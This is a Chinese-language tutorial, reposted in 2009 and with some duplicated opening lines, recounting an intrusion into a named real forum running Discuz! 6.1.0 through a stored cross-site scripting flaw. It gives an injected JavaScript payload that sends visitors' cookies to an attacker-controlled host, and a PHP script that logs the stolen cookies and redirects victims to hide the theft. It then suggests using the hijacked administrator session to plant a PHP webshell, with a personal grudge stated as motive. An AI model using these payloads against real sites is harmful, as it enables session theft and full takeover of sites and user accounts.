利用XSS滲透DISCUZ 6.1.0實戰(zhàn)

發(fā)布時間：2009-04-18 12:25:55 作者：佚名

網(wǎng)上關于XSS入侵網(wǎng)站的例子很多，但是大多都是一些惡作劇性質(zhì)的介紹.下面本人來親自介紹下利用腳本入侵國內(nèi)某安全論壇的過程就像主題所說一樣，今天測試的論壇是DISCUZ！ 6.1.0 目標：卡巴技術論壇 http://kpc

網(wǎng)上關于XSS入侵網(wǎng)站的例子很多，但是大多都是一些惡作劇性質(zhì)的介紹.下面本人來親自介紹下利用腳本入侵國內(nèi)某安全論壇的過程
就像主題所說一樣，今天測試的論壇是DISCUZ！ 6.1.0

目標：卡巴技術論壇 http://kpchina.net http://bbs.kpchina.net
工具：無（感覺本人的入侵方式不是很高級，低調(diào)，所以不用工具，需要的東西自己寫，都是腳本哦~！o(∩_∩)o...）

下面開始入侵：
XSS(Cross Site Scripting)攻擊，想要獲得權限就要找漏洞，大家都是知道，DISCUZ！ 6.1.0 論壇有XSS漏洞，這是前人的經(jīng)驗，我不邀功

很多人只是知道有XSS漏洞可以加個alert之類的標記，但是都屬于惡作劇的范疇，實用戰(zhàn)術才是抓住入侵的關鍵，讓那些大意的編程人員和系統(tǒng)管理員能夠提高安全意識。真正具有威脅性的XSS攻擊方式就是那就是網(wǎng)上提到的竊取Cookie，Cookie是保存在本機臨時目錄，記錄本機帳戶登錄網(wǎng)站的帳戶信息，竊取它，并不能看到被竊取人的帳號和密碼，有人會問，那有什么用，我們要的只是Cookie文件，只要把具有相應網(wǎng)站權限帳號的Cookie拷貝到入侵者自己機器的臨時目錄下，覆蓋刷新那個網(wǎng)站，就能自動登錄進去，獲得其站點權限。

上面說的是思路，下面說下如何活動卡巴論壇的管理權限

要獲得卡巴技術論壇的管理員帳號的Cookie，就要在論壇里注入獲得帳號Cookie的js腳本，將Cookie以post方式提交給入侵者

如圖：

論壇——>入侵者布置的跨站攻擊——>轉移被入侵這視線（隱蔽）

論壇插入腳本：

var img = new Image();
img.src = 'get_cookie.php?var=' + encodeURI(document.cookie);

但是我不一樣，因為他需要誘導人去點擊他的鏈接，但是現(xiàn)在人不是傻子，不會輕易點你的鏈接。而我是要把腳步插入論壇頁面中，這樣既隱蔽又省去了誘導的力氣
我插入的腳本如下：

**********************************************************************************************
<script language="JavaScript"> window.location.href="http://www.****.cn/upload_files/reg.php?var"+document.cookie; </script>
**********************************************************************************************

跨站攻擊腳本：
reg.php

************************************************************************************
<?php
if (isset($_GET['var'])) {
file_put_contents('./cookie/'.time().'.txt', urldecode($_GET['var']));
}
?>

<script language="JavaScript"> window.location.href="http://www.ccXv.com"; </script> //轉移頁面隱蔽上面記錄cookie的操作

************************************************************************************

剩下的步驟就是等著魚自己上鉤了

當管理員帳號點入論壇某個頁面時，這個頁面卻被轉到了某新聞網(wǎng)站，其實不知，他的cookie已經(jīng)被記錄

拿這個cookie登錄論壇，（刪東西不推薦哦~~），可以臨時開啟上傳php文件，例如phpwebshell，然后再關閉，這樣你就可以很輕松的操控整個論壇站點

為什么選擇此論壇做入侵講解，很簡單，這個論壇具備了多個漏洞：
一、論壇有XSS漏洞，沒有對輸入輸出做過濾
二、論壇采用cookie方式記錄用戶信息
三、對論壇上某個版主看不慣，有點權利亂封號，不過，畢竟論壇不是那個人的，還是對管理員手下留情吧（做人要厚道?。?/p>